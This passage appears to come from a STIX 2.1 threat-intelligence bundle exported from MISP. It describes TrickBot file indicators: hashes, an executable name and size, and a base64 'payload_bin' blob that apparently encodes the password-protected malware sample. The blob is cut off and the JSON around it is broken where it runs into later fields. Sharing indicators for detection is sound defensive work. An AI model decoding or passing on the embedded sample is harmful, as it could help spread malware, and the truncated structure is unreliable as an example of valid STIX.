qUs8VDIq6UgF7cy/siUDpFEdC9z+rC
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2020-03-17T10:28:29Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "file"
}
],
"labels": [
"misp:name=\"file\"",
"misp:meta-category=\"file\"",
"misp:to_ids=\"True\"",
"trickbot",
"kill-chain:Installation"
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5e70a3c0-8c80-4209-9e58-4d240a0a020f",
"created_by_ref": "identity--5e157d76-c92c-4acd-a54e-4a01950d210f",
"created": "2020-03-17T10:28:29.000Z",
"modified": "2020-03-17T10:28:29.000Z",
"pattern": "[file:hashes.MD5 = '2f1ac455d1c6e2a3f3e0d1137b047696' AND file:hashes.SHA1 = 'ba32c066d5927fa20b38d69357ce2ccee321b09a' AND file:hashes.SHA256 = 'cf99990bee6c378cbf56239b3cc88276eec348d82740f84e9d5c343751f82560' AND file:name = '61y3xfon4je4qk9qm5zy6v3xhzlxf8ubmvbs567ig7snb8vqwb27xk7rb2vh2_yk.exe' AND file:size = '115712' AND (file:content_ref.payload_bin = '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
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2020-03-17T10:28:29Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "file"
}
],
"labels": [
"misp:name=\"file\"",
"misp:meta-category=\"file\"",
"misp:to_ids=\"True\"",
"trickbot",
"kill-chain:Installation"
]
},
{
"type": "marking-definition",
"spec_version": "2.1",
"id": "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9",
"created": "2017-01-20T00:00:00.000Z",
"definition_type": "tlp",
"name": "TLP:WHITE",
"definition": {
"tlp": "white"
}
}
]
}
Reference in a new issue Copy permalink